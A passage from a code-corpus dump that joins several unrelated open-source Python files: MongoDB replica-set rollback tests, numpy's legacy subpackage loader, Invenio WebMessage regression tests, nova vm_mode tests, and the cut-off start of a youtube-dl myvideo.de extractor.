    from MongoDB and from every attached doc manager.
    """
    def tearDown(self):
        self.repl_set.stop()
    def setUp(self):
        # Create a new oplog progress file
        try:
            os.unlink("oplog.timestamp")
        except OSError:
            pass
        open("oplog.timestamp", "w").close()
        # Start a replica set
        self.repl_set = ReplicaSet().start()
        # Connection to the replica set as a whole
        self.main_conn = self.repl_set.client()
        # Connection to the primary specifically
        self.primary_conn = self.repl_set.primary.client()
        # Connection to the secondary specifically
        self.secondary_conn = self.repl_set.secondary.client(
            read_preference=ReadPreference.SECONDARY_PREFERRED)
        # Wipe any test data
        self.main_conn["test"]["mc"].drop()
        # Oplog thread
        doc_manager = DocManager()
        oplog_progress = LockingDict()
        self.opman = OplogThread(
            primary_client=self.main_conn,
            doc_managers=(doc_manager,),
            oplog_progress_dict=oplog_progress,
            ns_set=["test.mc"]
        )
    def test_single_target(self):
        """Test with a single replication target"""
        self.opman.start()
        # Insert first document with primary up
        self.main_conn["test"]["mc"].insert({"i": 0})
        self.assertEqual(self.primary_conn["test"]["mc"].find().count(), 1)
        # Make sure the insert is replicated
        secondary = self.secondary_conn
        assert_soon(lambda: secondary["test"]["mc"].count() == 1,
                    "first write didn't replicate to secondary")
        # Kill the primary
        self.repl_set.primary.stop(destroy=False)
        # Wait for the secondary to be promoted
        assert_soon(lambda: secondary["admin"].command("isMaster")["ismaster"])
        # Insert another document. This will be rolled back later
        retry_until_ok(self.main_conn["test"]["mc"].insert, {"i": 1})
        self.assertEqual(secondary["test"]["mc"].count(), 2)
        # Wait for replication to doc manager
        assert_soon(lambda: len(self.opman.doc_managers[0]._search()) == 2,
                    "not all writes were replicated to doc manager")
        # Kill the new primary
        self.repl_set.secondary.stop(destroy=False)
        # Start both servers back up
        self.repl_set.primary.start()
        primary_admin = self.primary_conn["admin"]
        assert_soon(lambda: primary_admin.command("isMaster")["ismaster"],
                    "restarted primary never resumed primary status")
        self.repl_set.secondary.start()
        assert_soon(lambda: retry_until_ok(secondary.admin.command,
                                           'replSetGetStatus')['myState'] == 2,
                    "restarted secondary never resumed secondary status")
        assert_soon(lambda:
                    retry_until_ok(self.main_conn.test.mc.find().count) > 0,
                    "documents not found after primary/secondary restarted")
        # Only first document should exist in MongoDB
        self.assertEqual(self.main_conn["test"]["mc"].count(), 1)
        self.assertEqual(self.main_conn["test"]["mc"].find_one()["i"], 0)
        # Same case should hold for the doc manager
        doc_manager = self.opman.doc_managers[0]
        assert_soon(lambda: len(doc_manager._search()) == 1,
                    'documents never rolled back in doc manager.')
        self.assertEqual(doc_manager._search()[0]["i"], 0)
        # cleanup
        self.opman.join()
    def test_many_targets(self):
        """Test with several replication targets"""
        # OplogThread has multiple doc managers
        doc_managers = [DocManager(), DocManager(), DocManager()]
        self.opman.doc_managers = doc_managers
        self.opman.start()
        # Insert a document into each namespace
        self.main_conn["test"]["mc"].insert({"i": 0})
        self.assertEqual(self.primary_conn["test"]["mc"].count(), 1)
        # Make sure the insert is replicated
        secondary = self.secondary_conn
        assert_soon(lambda: secondary["test"]["mc"].count() == 1,
                    "first write didn't replicate to secondary")
        # Kill the primary
        self.repl_set.primary.stop(destroy=False)
        # Wait for the secondary to be promoted
        assert_soon(lambda: secondary.admin.command("isMaster")['ismaster'],
                    'secondary was never promoted')
        # Insert more documents. This will be rolled back later
        # Some of these documents will be manually removed from
        # certain doc managers, to emulate the effect of certain
        # target systems being ahead/behind others
        secondary_ids = []
        for i in range(1, 10):
            secondary_ids.append(
                retry_until_ok(self.main_conn["test"]["mc"].insert,
                               {"i": i}))
        self.assertEqual(self.secondary_conn["test"]["mc"].count(), 10)
        # Wait for replication to the doc managers
        def docmans_done():
            # True only once every doc manager has seen all 10 documents.
            for dm in self.opman.doc_managers:
                if len(dm._search()) != 10:
                    return False
            return True
        assert_soon(docmans_done,
                    "not all writes were replicated to doc managers")
        # Remove some documents from the doc managers to simulate
        # uneven replication
        ts = self.opman.doc_managers[0].get_last_doc()['_ts']
        for id in secondary_ids[8:]:
            self.opman.doc_managers[1].remove(id, 'test.mc', ts)
        for id in secondary_ids[2:]:
            self.opman.doc_managers[2].remove(id, 'test.mc', ts)
        # Kill the new primary
        self.repl_set.secondary.stop(destroy=False)
        # Start both servers back up
        self.repl_set.primary.start()
        primary_admin = self.primary_conn["admin"]
        assert_soon(lambda: primary_admin.command("isMaster")['ismaster'],
                    'restarted primary never resumed primary status')
        self.repl_set.secondary.start()
        assert_soon(lambda: retry_until_ok(secondary.admin.command,
                                           'replSetGetStatus')['myState'] == 2,
                    "restarted secondary never resumed secondary status")
        assert_soon(lambda:
                    retry_until_ok(self.primary_conn.test.mc.find().count) > 0,
                    "documents not found after primary/secondary restarted")
        # Only first document should exist in MongoDB
        self.assertEqual(self.primary_conn["test"]["mc"].count(), 1)
        self.assertEqual(self.primary_conn["test"]["mc"].find_one()["i"], 0)
        # Give OplogThread some time to catch up
        time.sleep(10)
        # Same case should hold for the doc managers
        for dm in self.opman.doc_managers:
            self.assertEqual(len(dm._search()), 1)
            self.assertEqual(dm._search()[0]["i"], 0)
        self.opman.join()
    def test_deletions(self):
        """Test rolling back 'd' operations"""
        self.opman.start()
        # Insert a document, wait till it replicates to secondary
        self.main_conn["test"]["mc"].insert({"i": 0})
        self.main_conn["test"]["mc"].insert({"i": 1})
        self.assertEqual(self.primary_conn["test"]["mc"].find().count(), 2)
        assert_soon(lambda: self.secondary_conn["test"]["mc"].count() == 2,
                    "first write didn't replicate to secondary")
        # Kill the primary, wait for secondary to be promoted
        self.repl_set.primary.stop(destroy=False)
        assert_soon(lambda: self.secondary_conn["admin"]
                    .command("isMaster")["ismaster"])
        # Delete first document
        retry_until_ok(self.main_conn["test"]["mc"].remove, {"i": 0})
        self.assertEqual(self.secondary_conn["test"]["mc"].count(), 1)
        # Wait for replication to doc manager
        assert_soon(lambda: len(self.opman.doc_managers[0]._search()) == 1,
                    "delete was not replicated to doc manager")
        # Kill the new primary
        self.repl_set.secondary.stop(destroy=False)
        # Start both servers back up
        self.repl_set.primary.start()
        primary_admin = self.primary_conn["admin"]
        assert_soon(lambda: primary_admin.command("isMaster")["ismaster"],
                    "restarted primary never resumed primary status")
        self.repl_set.secondary.start()
        assert_soon(lambda: retry_until_ok(self.secondary_conn.admin.command,
                                           'replSetGetStatus')['myState'] == 2,
                    "restarted secondary never resumed secondary status")
        # Both documents should exist in mongo
        assert_soon(lambda: retry_until_ok(
            self.main_conn["test"]["mc"].count) == 2)
        # Both document should exist in doc manager
        doc_manager = self.opman.doc_managers[0]
        docs = list(doc_manager._search())
        self.assertEqual(len(docs), 2,
                         "Expected two documents, but got %r" % docs)
        self.opman.join()
    def test_stressed_rollback(self):
        """Stress test for a rollback with many documents."""
        self.opman.start()
        c = self.main_conn.test.mc
        docman = self.opman.doc_managers[0]
        c.insert({'i': i} for i in range(STRESS_COUNT))
        assert_soon(lambda: c.count() == STRESS_COUNT)
        condition = lambda: len(docman._search()) == STRESS_COUNT
        assert_soon(condition, ("Was expecting %d documents in DocManager, "
                                "but %d found instead."
                                % (STRESS_COUNT, len(docman._search()))))
        primary_conn = self.repl_set.primary.client()
        self.repl_set.primary.stop(destroy=False)
        new_primary_conn = self.repl_set.secondary.client()
        admin = new_primary_conn.admin
        assert_soon(
            lambda: retry_until_ok(admin.command, "isMaster")['ismaster'])
        # These writes land only on the interim primary; they must be
        # rolled back once the original primary returns.
        retry_until_ok(c.insert,
                       [{'i': str(STRESS_COUNT + i)}
                        for i in range(STRESS_COUNT)])
        assert_soon(lambda: len(docman._search()) == c.count())
        self.repl_set.secondary.stop(destroy=False)
        self.repl_set.primary.start()
        admin = primary_conn.admin
        assert_soon(
            lambda: retry_until_ok(admin.command, "isMaster")['ismaster'])
        self.repl_set.secondary.start()
        assert_soon(lambda: retry_until_ok(c.count) == STRESS_COUNT)
        assert_soon(condition, ("Was expecting %d documents in DocManager, "
                                "but %d found instead."
                                % (STRESS_COUNT, len(docman._search()))))
        self.opman.join()
| apache-2.0 |
greenoaktree/MissionPlanner | Lib/site-packages/numpy/_import_tools.py | 87 | 12888 | import os
import sys
__all__ = ['PackageLoader']
class PackageLoader:
    # NOTE: legacy Python 2 code (print statements, 'except E, msg', exec
    # statement form). Loads numpy/scipy-style subpackages into the calling
    # package's namespace, driven by per-subpackage info.py metadata files.
    def __init__(self, verbose=False, infunc=False):
        """ Manages loading packages.
        """
        if infunc:
            _level = 2
        else:
            _level = 1
        # Grab the caller's frame so that subsequent imports can be executed
        # directly in the parent package's namespace.
        self.parent_frame = frame = sys._getframe(_level)
        self.parent_name = eval('__name__',frame.f_globals,frame.f_locals)
        parent_path = eval('__path__',frame.f_globals,frame.f_locals)
        if isinstance(parent_path, str):
            parent_path = [parent_path]
        self.parent_path = parent_path
        if '__all__' not in frame.f_locals:
            # Make sure the parent has an __all__ list we can append to.
            exec('__all__ = []',frame.f_globals,frame.f_locals)
        self.parent_export_names = eval('__all__',frame.f_globals,frame.f_locals)
        self.info_modules = {}
        self.imported_packages = []
        # Verbosity level; set per-call in __call__.
        self.verbose = None
    def _get_info_files(self, package_dir, parent_path, parent_package=None):
        """ Return list of (package name,info.py file) from parent_path subdirectories.
        """
        from glob import glob
        files = glob(os.path.join(parent_path,package_dir,'info.py'))
        # Accept a compiled info.pyc only when no matching info.py exists.
        for info_file in glob(os.path.join(parent_path,package_dir,'info.pyc')):
            if info_file[:-1] not in files:
                files.append(info_file)
        info_files = []
        for info_file in files:
            package_name = os.path.dirname(info_file[len(parent_path)+1:])\
                           .replace(os.sep,'.')
            if parent_package:
                package_name = parent_package + '.' + package_name
            info_files.append((package_name,info_file))
            # Recurse into subdirectories for nested subpackages.
            info_files.extend(self._get_info_files('*',
                                                   os.path.dirname(info_file),
                                                   package_name))
        return info_files
    def _init_info_modules(self, packages=None):
        """Initialize info_modules = {<package_name>: <package info.py module>}.
        """
        import imp
        info_files = []
        info_modules = self.info_modules
        if packages is None:
            # No explicit list: discover every subpackage with an info file.
            for path in self.parent_path:
                info_files.extend(self._get_info_files('*',path))
        else:
            for package_name in packages:
                package_dir = os.path.join(*package_name.split('.'))
                for path in self.parent_path:
                    names_files = self._get_info_files(package_dir, path)
                    if names_files:
                        info_files.extend(names_files)
                        break
                else:
                    # Not found under parent_path; fall back to a regular
                    # import of <package>.info.
                    try:
                        exec 'import %s.info as info' % (package_name)
                        info_modules[package_name] = info
                    except ImportError, msg:
                        self.warn('No scipy-style subpackage %r found in %s. '\
                                  'Ignoring: %s'\
                                  % (package_name,':'.join(self.parent_path), msg))
        for package_name,info_file in info_files:
            if package_name in info_modules:
                continue
            fullname = self.parent_name +'.'+ package_name
            # Pick the imp file descriptor matching source vs compiled files.
            if info_file[-1]=='c':
                filedescriptor = ('.pyc','rb',2)
            else:
                filedescriptor = ('.py','U',1)
            try:
                info_module = imp.load_module(fullname+'.info',
                                              open(info_file,filedescriptor[1]),
                                              info_file,
                                              filedescriptor)
            except Exception,msg:
                self.error(msg)
                info_module = None
            if info_module is None or getattr(info_module,'ignore',False):
                info_modules.pop(package_name,None)
            else:
                # Load the info modules of this package's dependencies first.
                self._init_info_modules(getattr(info_module,'depends',[]))
                info_modules[package_name] = info_module
        return
    def _get_sorted_names(self):
        """ Return package names sorted in the order as they should be
        imported due to dependence relations between packages.
        """
        # Simple topological sort: repeatedly emit packages whose remaining
        # dependency list is empty and prune them from the others' lists.
        depend_dict = {}
        for name,info_module in self.info_modules.items():
            depend_dict[name] = getattr(info_module,'depends',[])
        package_names = []
        for name in depend_dict.keys():
            if not depend_dict[name]:
                package_names.append(name)
                del depend_dict[name]
        while depend_dict:
            for name, lst in depend_dict.items():
                new_lst = [n for n in lst if n in depend_dict]
                if not new_lst:
                    package_names.append(name)
                    del depend_dict[name]
                else:
                    depend_dict[name] = new_lst
        return package_names
    def __call__(self,*packages, **options):
        """Load one or more packages into parent package top-level namespace.

        This function is intended to shorten the need to import many
        subpackages, say of scipy, constantly with statements such as

          import scipy.linalg, scipy.fftpack, scipy.etc...

        Instead, you can say:

          import scipy
          scipy.pkgload('linalg','fftpack',...)

        or

          scipy.pkgload()

        to load all of them in one call.

        If a name which doesn't exist in scipy's namespace is
        given, a warning is shown.

        Parameters
        ----------
         *packages : arg-tuple
              the names (one or more strings) of all the modules one
              wishes to load into the top-level namespace.
         verbose= : integer
              verbosity level [default: -1].
              verbose=-1 will suspend also warnings.
         force= : bool
              when True, force reloading loaded packages [default: False].
         postpone= : bool
              when True, don't load packages [default: False]
        """
        frame = self.parent_frame
        self.info_modules = {}
        if options.get('force',False):
            self.imported_packages = []
        self.verbose = verbose = options.get('verbose',-1)
        postpone = options.get('postpone',None)
        self._init_info_modules(packages or None)
        self.log('Imports to %r namespace\n----------------------------'\
                 % self.parent_name)
        for package_name in self._get_sorted_names():
            if package_name in self.imported_packages:
                continue
            info_module = self.info_modules[package_name]
            global_symbols = getattr(info_module,'global_symbols',[])
            postpone_import = getattr(info_module,'postpone_import',False)
            # Honor postponed imports unless the package exports globals.
            if (postpone and not global_symbols) \
                   or (postpone_import and postpone is not None):
                continue
            old_object = frame.f_locals.get(package_name,None)
            cmdstr = 'import '+package_name
            if self._execcmd(cmdstr):
                continue
            self.imported_packages.append(package_name)
            if verbose!=-1:
                new_object = frame.f_locals.get(package_name)
                if old_object is not None and old_object is not new_object:
                    self.warn('Overwriting %s=%s (was %s)' \
                              % (package_name,self._obj2repr(new_object),
                                 self._obj2repr(old_object)))
            if '.' not in package_name:
                self.parent_export_names.append(package_name)
            for symbol in global_symbols:
                if symbol=='*':
                    # Expand '*' via the package's __all__, or dir() minus
                    # private names when __all__ is missing.
                    symbols = eval('getattr(%s,"__all__",None)'\
                                   % (package_name),
                                   frame.f_globals,frame.f_locals)
                    if symbols is None:
                        symbols = eval('dir(%s)' % (package_name),
                                       frame.f_globals,frame.f_locals)
                        symbols = filter(lambda s:not s.startswith('_'),symbols)
                else:
                    symbols = [symbol]
                if verbose!=-1:
                    old_objects = {}
                    for s in symbols:
                        if s in frame.f_locals:
                            old_objects[s] = frame.f_locals[s]
                cmdstr = 'from '+package_name+' import '+symbol
                if self._execcmd(cmdstr):
                    continue
                if verbose!=-1:
                    for s,old_object in old_objects.items():
                        new_object = frame.f_locals[s]
                        if new_object is not old_object:
                            self.warn('Overwriting %s=%s (was %s)' \
                                      % (s,self._obj2repr(new_object),
                                         self._obj2repr(old_object)))
                if symbol=='*':
                    self.parent_export_names.extend(symbols)
                else:
                    self.parent_export_names.append(symbol)
        return
    def _execcmd(self,cmdstr):
        """ Execute command in parent_frame.

        Returns True on failure (after logging the error), None on success.
        """
        frame = self.parent_frame
        try:
            exec (cmdstr, frame.f_globals,frame.f_locals)
        except Exception,msg:
            self.error('%s -> failed: %s' % (cmdstr,msg))
            return True
        else:
            self.log('%s -> success' % (cmdstr))
        return
    def _obj2repr(self,obj):
        """ Return repr(obj) annotated with its source module or file."""
        module = getattr(obj,'__module__',None)
        file = getattr(obj,'__file__',None)
        if module is not None:
            return repr(obj) + ' from ' + module
        if file is not None:
            return repr(obj) + ' from ' + file
        return repr(obj)
    def log(self,mess):
        # Shown only at verbose > 1.
        if self.verbose>1:
            print >> sys.stderr, str(mess)
    def warn(self,mess):
        # Suppressed when verbose == -1.
        if self.verbose>=0:
            print >> sys.stderr, str(mess)
    def error(self,mess):
        if self.verbose!=-1:
            print >> sys.stderr, str(mess)
    def _get_doc_title(self, info_module):
        """ Get the title from a package info.py file.
        """
        title = getattr(info_module,'__doc_title__',None)
        if title is not None:
            return title
        # Fall back to the first line of the module docstring.
        title = getattr(info_module,'__doc__',None)
        if title is not None:
            title = title.lstrip().split('\n',1)[0]
            return title
        return '* Not Available *'
    def _format_titles(self,titles,colsep='---'):
        # Render (name, title) pairs as an aligned, word-wrapped two-column
        # listing suitable for a doc summary.
        display_window_width = 70 # How to determine the correct value in runtime??
        lengths = [len(name)-name.find('.')-1 for (name,title) in titles]+[0]
        max_length = max(lengths)
        lines = []
        for (name,title) in titles:
            name = name[name.find('.')+1:]
            w = max_length - len(name)
            words = title.split()
            line = '%s%s %s' % (name,w*' ',colsep)
            tab = len(line) * ' '
            while words:
                word = words.pop(0)
                if len(line)+len(word)>display_window_width:
                    lines.append(line)
                    line = tab
                line += ' ' + word
            else:
                lines.append(line)
        return '\n'.join(lines)
    def get_pkgdocs(self):
        """ Return documentation summary of subpackages.
        """
        import sys
        self.info_modules = {}
        self._init_info_modules(None)
        titles = []
        symbols = []
        for package_name, info_module in self.info_modules.items():
            global_symbols = getattr(info_module,'global_symbols',[])
            fullname = self.parent_name +'.'+ package_name
            note = ''
            # Flag packages that are not yet imported.
            if fullname not in sys.modules:
                note = ' [*]'
            titles.append((fullname,self._get_doc_title(info_module) + note))
            if global_symbols:
                symbols.append((package_name,', '.join(global_symbols)))
        retstr = self._format_titles(titles) +\
               '\n [*] - using a package requires explicit import (see pkgload)'
        if symbols:
            retstr += """\n\nGlobal symbols from subpackages"""\
                      """\n-------------------------------\n""" +\
                      self._format_titles(symbols,'-->')
        return retstr
class PackageLoaderDebug(PackageLoader):
    # Debug variant: echoes each import command to stdout before running it
    # and lets exceptions propagate instead of swallowing them.
    def _execcmd(self,cmdstr):
        """ Execute command in parent_frame."""
        frame = self.parent_frame
        print 'Executing',`cmdstr`,'...',
        sys.stdout.flush()
        exec (cmdstr, frame.f_globals,frame.f_locals)
        print 'ok'
        sys.stdout.flush()
        return
# Opt into the debug loader via the NUMPY_IMPORT_DEBUG environment variable.
if int(os.environ.get('NUMPY_IMPORT_DEBUG','0')):
    PackageLoader = PackageLoaderDebug
| gpl-3.0 |
jmartinm/invenio-master | modules/webmessage/lib/webmessage_regression_tests.py | 16 | 14143 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""WebMessage Regression Test Suite."""
__revision__ = "$Id$"
from invenio.testutils import InvenioTestCase
from invenio.config import CFG_SITE_URL
from invenio.testutils import make_test_suite, run_test_suite, \
test_web_page_content, merge_error_messages
from invenio import webmessage
from invenio.config import CFG_SITE_LANG
from invenio.webmessage_dblayer import CFG_WEBMESSAGE_STATUS_CODE, \
check_quota, \
count_nb_messages, \
create_message, \
datetext_default, \
delete_all_messages, \
delete_message_from_user_inbox, \
get_all_messages_for_user, \
get_gids_from_groupnames, \
get_groupnames_like, \
get_nb_new_messages_for_user, \
get_nb_readable_messages_for_user, \
get_nicknames_like, \
get_nicks_from_uids, \
get_uids_from_emails, \
get_uids_from_nicks, \
get_uids_members_of_groups, \
send_message, \
set_message_status, \
user_exists
class WebMessageWebPagesAvailabilityTest(InvenioTestCase):
    """Check WebMessage web pages whether they are up or not."""

    def test_your_message_pages_availability(self):
        """webmessage - availability of Your Messages pages"""
        baseurl = CFG_SITE_URL + '/yourmessages/'
        pages = ('', 'display', 'write', 'send', 'delete', 'delete_all',
                 'display_msg')
        error_messages = []
        # Probe every exported page and collect all failures before
        # reporting, so one broken page does not hide the others.
        for page in pages:
            error_messages.extend(test_web_page_content(baseurl + page))
        if error_messages:
            self.fail(merge_error_messages(error_messages))
        return
class WebMessageSendingAndReceivingMessageTest(InvenioTestCase):
    """Check sending and receiving message throught WebMessage"""

    def _send_message(self, uid_from=6, nickname="romeo",
                      subject="Hi romeo", body="hello romeo how are you?"):
        """Helper: send one message through the WebMessage interface.

        The defaults mimic juliet (uid 6) writing to romeo; the identical
        6-line perform_request_send() call was previously duplicated in
        every test below, so it is factored out here (DRY).
        """
        webmessage.perform_request_send(uid_from,
                                        msg_to_user=nickname,
                                        msg_to_group="",
                                        msg_subject=subject,
                                        msg_body=body,
                                        ln=CFG_SITE_LANG)

    def test_sending_message(self):
        """webmessage - send and receive a message"""
        # juliet writes the message to romeo
        self._send_message()
        # it is verified that romeo received the message
        result = get_all_messages_for_user(5)
        self.assertEqual("Hi romeo", result[0][3])
        self.assertEqual("juliet", result[0][2])
        webmessage.perform_request_delete_msg(5, result[0][0], ln=CFG_SITE_LANG)

    def test_setting_message_status(self):
        """webmessage - status from "new" to "read" """
        # juliet writes the message to romeo
        self._send_message()
        msgid = get_all_messages_for_user(5)[0][0]
        # status is changed
        set_message_status(5, msgid, 'R')
        msgstatus = get_all_messages_for_user(5)[0][5]
        self.assertEqual(msgstatus, 'R')
        webmessage.perform_request_delete_msg(5, msgid, ln=CFG_SITE_LANG)

    def test_getting_nb_new_msg(self):
        """webmessage - count the nb of new message"""
        delete_all_messages(5)
        # juliet writes the message to romeo
        self._send_message()
        self.assertEqual(get_nb_new_messages_for_user(5), 1)

    def test_getting_nb_readable_messages(self):
        """webmessage - get the nb of readable messages"""
        delete_all_messages(5)
        # juliet writes the message to romeo
        self._send_message()
        msgid = get_all_messages_for_user(5)[0][0]
        # status is changed
        set_message_status(5, msgid, 'R')
        self.assertEqual(get_nb_readable_messages_for_user(5), 1)
        webmessage.perform_request_delete_msg(5, msgid, ln=CFG_SITE_LANG)

    def test_getting_all_messages_for_user(self):
        """webmessage - get all message for user"""
        delete_all_messages(5)
        # juliet writes 3 messages to romeo
        for dummy in range(3):
            self._send_message()
        self.assertEqual(len(get_all_messages_for_user(5)), 3)
        delete_all_messages(5)

    def test_count_nb_message(self):
        """webmessage - count the number of messages"""
        delete_all_messages(5)
        # juliet writes 3 messages to romeo
        for dummy in range(3):
            self._send_message()
        self.assertEqual(count_nb_messages(5), 3)
        delete_all_messages(5)
        self.assertEqual(count_nb_messages(5), 0)

    def test_delete_message_from_user_inbox(self):
        """webmessage - delete message from user inbox"""
        delete_all_messages(5)
        # juliet writes a message to romeo
        self._send_message()
        msg_id = get_all_messages_for_user(5)[0][0]
        delete_message_from_user_inbox(5, msg_id)
        self.assertEqual(count_nb_messages(5), 0)

    def test_create_message(self):
        """webmessage - create msg but do not send it"""
        msgid = create_message(6,
                               users_to_str="romeo",
                               groups_to_str="montague-family",
                               msg_subject="hello",
                               msg_body="how are you",
                               msg_send_on_date=datetext_default)
        send_message(5, msgid, status=CFG_WEBMESSAGE_STATUS_CODE['NEW'])
        result = get_all_messages_for_user(5)
        self.assertEqual(msgid, result[0][0])
        delete_all_messages(2)

    def test_send_message(self):
        """webmessage - sending message using uid msgid"""
        # create a message to know the msgid
        msgid = create_message(6,
                               users_to_str="romeo",
                               groups_to_str="montague-family",
                               msg_subject="hello",
                               msg_body="how are you",
                               msg_send_on_date=datetext_default)
        send_message(5, msgid, status=CFG_WEBMESSAGE_STATUS_CODE['NEW'])
        result = get_all_messages_for_user(5)
        self.assertEqual("hello", result[0][3])
        webmessage.perform_request_delete_msg(5, result[0][0], ln=CFG_SITE_LANG)

    def test_check_quota(self):
        """webmessage - you give a quota, it returns users over-quota"""
        # jekyll (uid 2) receives 4 messages, putting him over a quota of 3
        for dummy in range(4):
            self._send_message(nickname="jekyll", subject="Hi jekyll",
                               body="hello how are you?")
        d = check_quota(3)
        self.assertEqual(d.keys()[0], 2)
        delete_all_messages(2)
class WebMessageGettingUidsGidsTest(InvenioTestCase):
    """Many way to get uids or gids"""

    def test_get_uids_from_nicks(self):
        """webmessage - get uid from nick"""
        mapping = get_uids_from_nicks('juliet')
        self.assertEqual(mapping.get('juliet'), 6)

    def test_get_nicks_from_uids(self):
        """webmessage - get nick from uid"""
        mapping = get_nicks_from_uids(6)
        self.assertEqual(mapping.get(6), 'juliet')

    def test_get_uids_from_emails(self):
        """webmessage - get uid from email"""
        juliet_email = 'juliet.capulet@cds.cern.ch'
        mapping = get_uids_from_emails(juliet_email)
        self.assertEqual(mapping.get(juliet_email), 6)

    def test_get_gids_from_groupnames(self):
        """webmessage - get gid from groupname"""
        mapping = get_gids_from_groupnames('montague-family')
        self.assertEqual(mapping.get('montague-family'), 2)

    def test_get_uids_members_of_groups(self):
        """webmessage - get uids members of group"""
        members = get_uids_members_of_groups(2)
        # Group 2 (montague-family) is expected to contain uids 5, 6 and 7.
        for position, expected_uid in enumerate((5, 6, 7)):
            self.assertEqual(members[position], expected_uid)

    def test_user_exists(self):
        """webmessage - check if a user exist"""
        self.assertEqual(user_exists(6), 1)
class WebMessagePatternTest(InvenioTestCase):
    """pattern"""

    def test_get_nicknames_like(self):
        """webmessage - get nickname"""
        # Both 'j.' and 'j+' patterns should match the two demo-data
        # nicknames starting with 'j', returned as 1-tuples.
        result = get_nicknames_like('j.')
        self.assertEqual(result[0], ('jekyll',))
        self.assertEqual(result[1], ('juliet',))
        result = get_nicknames_like('j+')
        self.assertEqual(result[0], ('jekyll',))
        self.assertEqual(result[1], ('juliet',))

    def test_get_groupnames_like(self):
        """webmessage - get groupname"""
        d = get_groupnames_like(5,'mont+')
        # NOTE: `2L` is a Python 2 long literal, and `d.keys()[0]` relies
        # on Python 2's dict.keys() returning a list.
        self.assertEqual(d.keys()[0], 2L)
        self.assertEqual(d.values()[0], 'montague-family')
# Regression test suite aggregating all webmessage test cases above.
TEST_SUITE = make_test_suite(WebMessageWebPagesAvailabilityTest,
                             WebMessageSendingAndReceivingMessageTest,
                             WebMessageGettingUidsGidsTest,
                             WebMessagePatternTest)

if __name__ == "__main__":
    # warn_user=True — presumably warns before running tests that write to
    # the database (the sending tests above do); confirm against the runner.
    run_test_suite(TEST_SUITE, warn_user=True)
| gpl-2.0 |
ntt-sic/nova | nova/tests/compute/test_vmmode.py | 11 | 1575 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import exception
from nova import test
from nova.compute import vm_mode
class ComputeVMModeTest(test.NoDBTestCase):
    """Tests for nova.compute.vm_mode.get_from_instance()."""

    def _resolve(self, raw_mode):
        """Build a minimal instance dict and resolve its vm_mode."""
        return vm_mode.get_from_instance(dict(vm_mode=raw_mode))

    def test_case(self):
        # Mixed case is normalized to lower case.
        self.assertEqual(self._resolve("HVM"), "hvm")

    def test_legacy_pv(self):
        # Legacy alias 'pv' resolves to 'xen'.
        self.assertEqual(self._resolve("pv"), "xen")

    def test_legacy_hv(self):
        # Legacy alias 'hv' resolves to 'hvm'.
        self.assertEqual(self._resolve("hv"), "hvm")

    def test_bogus(self):
        # Unknown modes raise exception.Invalid.
        self.assertRaises(exception.Invalid,
                          self._resolve,
                          "wibble")

    def test_good(self):
        self.assertEqual(self._resolve("hvm"), "hvm")
| apache-2.0 |
LordDamionDevil/Lony | lib/youtube_dl/extractor/myvideo.py | 34 | 6291 | from __future__ import unicode_literals
import binascii
import base64
import hashlib
import re
import json
from .common import InfoExtractor
from ..compat import (
compat_ord,
compat_urllib_parse_unquote,
compat_urllib_parse_urlencode,
)
from ..utils import (
ExtractorError,
sanitized_Request,
)
class MyVideoIE(InfoExtractor):
    """InfoExtractor for myvideo.de watch pages.

    Tries, in order: a direct <source> tag in the page, a JSON config
    service, and finally an RC4-encrypted XML blob holding the stream
    parameters.
    """
    # Marked broken: the extractor is skipped unless explicitly enabled.
    _WORKING = False
    _VALID_URL = r'https?://(?:www\.)?myvideo\.de/(?:[^/]+/)?watch/(?P<id>[0-9]+)/[^?/]+.*'
    IE_NAME = 'myvideo'
    _TEST = {
        'url': 'http://www.myvideo.de/watch/8229274/bowling_fail_or_win',
        'md5': '2d2753e8130479ba2cb7e0a37002053e',
        'info_dict': {
            'id': '8229274',
            'ext': 'flv',
            'title': 'bowling-fail-or-win',
        }
    }

    # Original Code from: https://github.com/dersphere/plugin.video.myvideo_de.git
    # Released into the Public Domain by Tristan Fischer on 2013-05-19
    # https://github.com/rg3/youtube-dl/pull/842
    def __rc4crypt(self, data, key):
        """Apply the RC4 stream cipher to `data` using `key` (RC4 is
        symmetric, so this both encrypts and decrypts)."""
        # Key-scheduling algorithm: permute the 256-entry state box.
        x = 0
        box = list(range(256))
        for i in list(range(256)):
            x = (x + box[i] + compat_ord(key[i % len(key)])) % 256
            box[i], box[x] = box[x], box[i]
        # Pseudo-random generation: XOR each input byte with the keystream.
        x = 0
        y = 0
        out = ''
        for char in data:
            x = (x + 1) % 256
            y = (y + box[x]) % 256
            box[x], box[y] = box[y], box[x]
            out += chr(compat_ord(char) ^ box[(box[x] + box[y]) % 256])
        return out

    def __md5(self, s):
        """Return the hex MD5 digest of `s`, encoded to bytes."""
        return hashlib.md5(s).hexdigest().encode()

    def _real_extract(self, url):
        mobj = re.match(self._VALID_URL, url)
        video_id = mobj.group('id')

        # Static secret (doubly base64-encoded) used below to derive the
        # RC4 key for the encrypted XML configuration.
        GK = (
            b'WXpnME1EZGhNRGhpTTJNM01XVmhOREU0WldNNVpHTTJOakpt'
            b'TW1FMU5tVTBNR05pWkRaa05XRXhNVFJoWVRVd1ptSXhaVEV3'
            b'TnpsbA0KTVRkbU1tSTRNdz09'
        )

        # Get video webpage
        webpage_url = 'http://www.myvideo.de/watch/%s' % video_id
        webpage = self._download_webpage(webpage_url, video_id)

        # Strategy 1: a plain <source> tag pointing at the video file.
